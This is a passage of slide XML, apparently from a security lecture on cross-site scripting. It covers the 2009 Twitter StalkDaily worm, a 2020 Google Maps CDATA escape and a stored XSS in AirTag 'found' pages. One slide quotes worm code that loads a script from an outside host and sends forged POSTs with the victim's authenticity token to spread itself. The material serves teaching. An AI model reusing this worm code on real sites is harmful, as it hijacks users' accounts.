                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mikeyylolz.uuuq.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;&lt;/script&gt;&lt;a ');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ajaxConn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XHConn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ajaxConn.connect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/status/update</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>", "POST", "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>authenticity_token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>authtoken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+"&amp;status="+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>update</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+"&amp;tab=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>home&amp;update</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=update");</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ajaxConn1.connect(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/account/settings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>", "POST", "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>authenticity_token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>authtoken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+"&amp;user[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]="+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+"&amp;tab=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>home&amp;update</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=update")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Arrow Connector 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7359F376-F585-E446-8E43-70CBE0184162}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5600700" y="3700139"/>
            <a:ext cx="1023582" cy="1436427"/>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0B2C5442-6857-2848-B6A5-E4501AF1377F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5715000" y="4462815"/>
            <a:ext cx="794982" cy="1227161"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="2857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TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D32B558-FEBA-D045-9418-9FCE3B6B3D0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5715000" y="6147679"/>
            <a:ext cx="6006773" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>dcortesi.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>/2009/04/11/twitter-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>stalkdaily</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>-worm-postmortem</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3900755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2FC41A-6631-8244-B818-7B8996230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900" y="914400"/>
            <a:ext cx="8112034" cy="457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2247F64-851C-5841-A354-0B943E6A01F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="4167" t="20128" r="3333"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="1676400"/>
            <a:ext cx="8851605" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Oval 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82DE2953-7EE4-F347-BE8D-B248E1B8A0B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7391400" y="1828800"/>
            <a:ext cx="1676400" cy="4572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2" name="Oval 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4F65120-8FBA-6F4E-945B-64B152BC34F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7848600" y="2964566"/>
            <a:ext cx="1676400" cy="4572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13" name="Oval 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A0E3319-02FF-0046-A5CB-E983ED03ACC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3276600" y="2053542"/>
            <a:ext cx="1676400" cy="457200"/>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395553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036C93-D39E-7E4F-BD51-D327F7E66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65" y="1840174"/>
            <a:ext cx="8229601" cy="973039"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73D23F12-1EA9-A446-8537-5F8076F17D9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1209065" y="3123658"/>
            <a:ext cx="100584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Google lets users create maps, export in XML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Server response uses CDATA tags to tell the browser not to interpret/render user’s data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Adding ]] at the beginning of map name escapes CDATA tags</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>User adds XSS script hidden in SVG, XML-based image format</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Browser executes the script</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5544DEE-61BC-D145-BA11-ED131887E1DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3207224" y="6046129"/>
            <a:ext cx="8666327" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>threatpost.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>/bug-in-google-maps-opened-door-to-cross-site-scripting-attacks/159006/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77AD89FE-E15E-5E40-A09D-D32B0B7CF75E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Google Maps (2020)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3391085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583CD32-2BB6-CC42-A13F-8D7208FEC3B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="611575" y="1080709"/>
            <a:ext cx="2739673" cy="2348291"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4098" name="Picture 2" descr="Apple&amp;#39;s AirTags Are a Gift to Stalkers | WIRED">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{349794E5-FAFF-604F-BCC3-34097C055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566" y="672935"/>
            <a:ext cx="3642289" cy="22142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DC0040-E645-F34E-9B81-CF2849EFF0D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="764089" y="3651928"/>
            <a:ext cx="7415899"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If a stranger finds a tagged item, they can scan it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Generates a unique </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://found.apple.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Page contains the tag’s serial number, phone number, and a personal message for the finder</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4100" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8722795F-D3E7-A447-A98F-4CD92A1748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2100"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7940588" y="3236196"/>
            <a:ext cx="2886075" cy="1985392"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="38100" dir="2700000" sx="104000" sy="104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3EB2EA-536F-D140-8EEB-9FA4C9A7381B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3995804" y="5392646"/>
            <a:ext cx="3299301" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stored XSS vulnerability!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5DEAC8D-E6ED-E94A-AD91-56AA05F4E506}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3995803" y="5806707"/>
            <a:ext cx="3707704" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What attacks are possible?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98935D33-10D0-424D-B81D-2183B31C3E7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8524501" y="672935"/>
            <a:ext cx="3057247" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Known since June 2021</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reported September 28, 2021</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BEA2AE81-F092-594A-9221-009FEA5154C4}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1206271" y="5212272"/>
              <a:ext cx="901440" cy="24480"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="10" name="Ink 9">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEA2AE81-F092-594A-9221-009FEA5154C4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId7"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="1170631" y="5176272"/>
                <a:ext cx="973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F49B75-DE65-3743-A2AB-4665E357FC89}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6103711" y="4752912"/>
              <a:ext cx="860040" cy="39960"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="12" name="Ink 11">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11F49B75-DE65-3743-A2AB-4665E357FC89}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId9"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="6068071" y="4717272"/>
                <a:ext cx="931680" cy="111600"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="20" name="Group 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15A23143-FEEE-4A43-A969-4B699B534E31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10435804" y="1349111"/>
            <a:ext cx="316440" cy="297720"/>
            <a:chOff x="10708111" y="1092072"/>
            <a:chExt cx="316440" cy="29772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11AC46AC-FD97-F446-B3D7-7A29E920BD35}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="10835551" y="1102872"/>
                <a:ext cx="128160" cy="286920"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="16" name="Ink 15">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11AC46AC-FD97-F446-B3D7-7A29E920BD35}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId11"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
